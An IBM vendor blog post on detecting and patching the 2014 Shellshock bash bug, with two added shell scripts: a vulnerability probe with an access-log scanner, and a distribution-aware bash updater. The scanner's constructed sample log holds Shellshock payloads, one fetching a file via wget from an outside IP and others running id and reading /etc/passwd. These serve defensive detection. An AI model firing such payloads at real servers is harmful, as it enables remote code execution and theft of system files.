October 10, 2014 By Rohan Ramesh 3 min read

Endpoint Security for Your Organization

An old maxim tells us an ounce of prevention is worth a pound of cure. And that’s great advice — unless you unfortunately missed the prevention step and need a cure quickly.

A quick Web search shows the severity of the recent Bash bug, better known as Shellshock. Most of that coverage has focused on prevention, which is advice well worth heeding, but there has been little information about the cure, until now.

To implement the cure for Shellshock, organizations need a way to assess their endpoint environment and then deploy and manage the patches for the many operating systems in it. An effective solution provides policy-based installation of security updates, closed-loop verification (confirming on each endpoint that the patch actually applied) and the ability to manage patches across multiple platforms from a single point of control. It must also shrink patch deployment time, since every day a vulnerable copy of bash stays reachable is a day it can be exploited. As organizations look for best practices on updating all of their affected systems, they look for a solution that can do the following:

  • Automatically manage patches for multiple operating systems across hundreds or thousands of endpoints, regardless of location, connection type or status
  • Reduce security and compliance risk by slashing remediation cycles from weeks to hours
  • Provide visibility into patch compliance with real-time monitoring and reporting
  • Patch online and offline virtual machines to improve security in virtual environments
  • Provide consistent functionality, even over low-bandwidth or globally distributed networks

To help organizations address this vulnerability, IBM provides security solutions that can help prevent, detect and respond to the Shellshock threat.

Preventing Shellshock

IBM has been able to identify and block attacks that exploit this threat through its IBM Security Network Intrusion Prevention offering. Because the product focuses on shielding the vulnerability itself from attempted exploits rather than on any single attack, IBM has been helping clients protect against this class of exploit since 2007.

Read more about how you could have prevented attackers from exploiting Shellshock and other similar vulnerabilities.

Detection

If an endpoint was exploited through Shellshock before a patch was available, patching alone will not remove whatever the attacker left behind. Finding the threat means understanding the behavior of each individual attack component (the input that carried the crafted environment variable, the command it spawned and any follow-on activity) and using analytics to link those components together.

The key tasks in detection include the following:

  • Discover: Understand where the Shellshock vulnerability is in your endpoint environment
  • Assess risk: Understand how exposed the instances of this vulnerability are to potential attack
  • Detect attacks: Monitor and detect potential exploits of the Shellshock vulnerability

A “closed loop” system can quickly detect threats and alert security administrators to take the necessary corrective actions. With IBM BigFix, you can quickly determine which endpoints, including servers, workstations and other devices, are vulnerable to the Bash bug. IBM Security QRadar can leverage data from network and endpoint security solutions to see immediately whether someone is trying to exploit an operating system vulnerability. QRadar can then alert the security team, which uses an endpoint management solution such as BigFix to remediate the condition.
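The “discover” and “detect attacks” tasks above, done by hand on a single host, as an added example that is not code from the original post or from BigFix/QRadar. It assumes the two original Shellshock CVE numbers, CVE-2014-6271 and CVE-2014-7169, and access logs in Apache/nginx combined format; the four-line log it scans is constructed for the example, not real traffic.

```shell
#!/bin/sh
# Added example (not IBM's or BigFix's code): the "discover" and "detect
# attacks" steps for Shellshock on one host. Assumed: CVE-2014-6271 and
# CVE-2014-7169 are the two original bash bugs; logs are in combined format.

# Returns 0 if the bash at $1 (default: first bash on PATH) is vulnerable,
# 1 if neither probe fires, 2 if no usable bash was found.
shellshock_vulnerable() {
    bash_bin="${1:-$(command -v bash 2>/dev/null)}"
    [ -n "$bash_bin" ] && [ -x "$bash_bin" ] || return 2

    # CVE-2014-6271: bash imported the function from the environment and kept
    # parsing, so the "echo SHELLSHOCK" after the body ran as a command.
    out=$(env x='() { :;}; echo SHELLSHOCK' "$bash_bin" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK*) return 0 ;;
    esac

    # CVE-2014-7169: the incomplete first fix left parser state behind, so
    # "echo date" became ">echo date" and wrote date's output to a file
    # literally named "echo" in the working directory.
    tmp=$(mktemp -d) || return 2
    (cd "$tmp" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1)
    if [ -e "$tmp/echo" ]; then
        rm -rf "$tmp"
        return 0
    fi
    rm -rf "$tmp"
    return 1
}

# Prints every log line whose request, Referer or User-Agent carries the
# "() {" prefix used to smuggle a function definition into a CGI environment
# variable. Bash only imported values starting with exactly "() {", but the
# pattern also accepts "(){" so that sloppy scanners are still surfaced.
scan_log() {
    grep -E '\(\) ?\{' "$1"
}

# Writes a constructed four-line access log to $1: three probes (one of them
# malformed) and one benign request. Not real traffic.
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.5/x -O /tmp/x'"
192.0.2.11 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.12 - - [25/Sep/2014:10:13:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 220 "() { :; }; echo; /usr/bin/id" "curl/7.38"
192.0.2.13 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/help HTTP/1.1" 200 300 "-" "(){ :;}; /bin/cat /etc/passwd"
EOF
}

# Stand-alone run: probe the local bash, then scan the constructed log.
if shellshock_vulnerable; then
    echo "bash on this host is VULNERABLE to Shellshock"
else
    echo "bash on this host is not vulnerable (or bash is absent)"
fi
log=$(mktemp)
write_sample_log "$log"
hits=$(scan_log "$log" | wc -l | tr -d ' ')
echo "exploit attempts in sample log: $hits"
rm -f "$log"
```

Run it as an unprivileged user on each host, or feed the real access log path to scan_log; the probe never writes outside a private temporary directory, and a hit from scan_log on a host whose probe also returns 0 is the case the Response section below is about.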

Responding

Today, it is not a matter of if an organization will be breached, but rather a question of when a breach will take place. This means organizations need to have the ability to respond rapidly once an initial incident or vulnerability has been detected. The key response functions include the following:

  • Identifying the type and version of OS on each endpoint previously detected as vulnerable
  • Remediating each endpoint with the patch appropriate to the OS version it is running

Having used Endpoint Manager (BigFix) to detect which endpoints are vulnerable and which OS types and versions they run, you now have to patch those endpoints quickly and efficiently.

BigFix can apply patches across multiple operating systems within minutes, including UNIX, Linux and OS X, all of which have reportedly been affected by Shellshock. BigFix customers have realized up to a 98 percent first-pass patch success rate and can rapidly apply Shellshock patches for all OS types, including CentOS 5 and 6, RHEL 5 and 6, zLinux, SLE 11 and SLE 11 for System z, Solaris, Mac OS X and Ubuntu. With BigFix's real-time visibility into the status of managed endpoints, you can confirm that all your endpoints have been patched rather than assume it.
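The two response functions listed above, identify the OS and apply the right bash patch, done by hand for a Linux host and followed by a re-check so the fix is verified rather than assumed, as an added example that is not code from the original post or from BigFix. It assumes /etc/os-release is present (RHEL/CentOS 7 and later, SLES 12 and later, Debian/Ubuntu) and treats a host with only /etc/redhat-release (RHEL/CentOS 5 and 6) as Red Hat; Solaris and OS X from the list above are left out because their update mechanisms differ. CVE-2014-6271 is assumed to be the first Shellshock CVE.

```shell
#!/bin/sh
# Added example (not IBM's or BigFix's code): identify the distribution, pick
# its package manager, upgrade bash, then re-probe for CVE-2014-6271.
# Assumed: /etc/os-release exists on current distributions; RHEL/CentOS 5 and
# 6 expose only /etc/redhat-release and are reported as "redhat".

# Prints the distribution ID ("rhel", "centos", "ubuntu", ...) read from an
# os-release file ($1, default /etc/os-release), "redhat" for old RHEL/CentOS,
# or "unknown".
os_id() {
    rel="${1:-/etc/os-release}"
    if [ -r "$rel" ]; then
        sed -n 's/^ID=//p' "$rel" | tr -d '"'
    elif [ -r /etc/redhat-release ]; then
        echo redhat
    else
        echo unknown
    fi
}

# Prints the command that upgrades only the bash package on distribution $1;
# returns 1 for a distribution with no rule so the caller can escalate.
bash_update_cmd() {
    case "$1" in
        rhel|centos|redhat) echo "yum -y update bash" ;;
        sles)               echo "zypper -n update bash" ;;
        debian|ubuntu)      echo "apt-get update && apt-get -y install --only-upgrade bash" ;;
        *)                  return 1 ;;
    esac
}

# CVE-2014-6271 probe: returns 0 if bash still runs the command smuggled after
# a function body in an environment variable, 1 if patched or bash is absent.
probe_6271() {
    out=$(env x='() { :;}; echo SHELLSHOCK' bash -c 'echo probe' 2>/dev/null) || return 1
    case "$out" in *SHELLSHOCK*) return 0 ;; esac
    return 1
}

# Runs the update only when RUN_UPDATE=1 (so reading or dry-running the script
# is harmless), then re-probes. Exit codes: 0 patched, 2 unknown distribution,
# 3 package manager failed, 4 still vulnerable after the update.
remediate_bash() {
    id=$(os_id)
    cmd=$(bash_update_cmd "$id") || { echo "no update rule for '$id'"; return 2; }
    if [ "${RUN_UPDATE:-0}" = "1" ]; then
        sh -c "$cmd" || return 3
    else
        echo "dry run on $id; would run: $cmd"
    fi
    if probe_6271; then
        echo "bash is STILL VULNERABLE to CVE-2014-6271"
        return 4
    fi
    echo "bash is not vulnerable to CVE-2014-6271"
}

# Stand-alone run: dry run unless RUN_UPDATE=1 was exported by the caller.
remediate_bash || echo "remediation exit code: $?"
```

The non-zero exit codes are the point: a management agent or cron wrapper that runs this on every host gets a distinct status for "no rule for this OS", "package manager failed" and "update ran but bash is still vulnerable", which is exactly the closed-loop confirmation the paragraph above asks for.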

BigFix supports over 130 platforms out of the box and helps ensure your endpoints are in continuous compliance with your security and regulatory policies — all through a single console, regardless of endpoint type, OS version or location. By automating the remediation, BigFix helps customers close the loop by supporting the response phase of the IBM Threat Protection System.

An ounce of prevention is certainly worth a pound of cure. With IBM Security solutions, you get both.
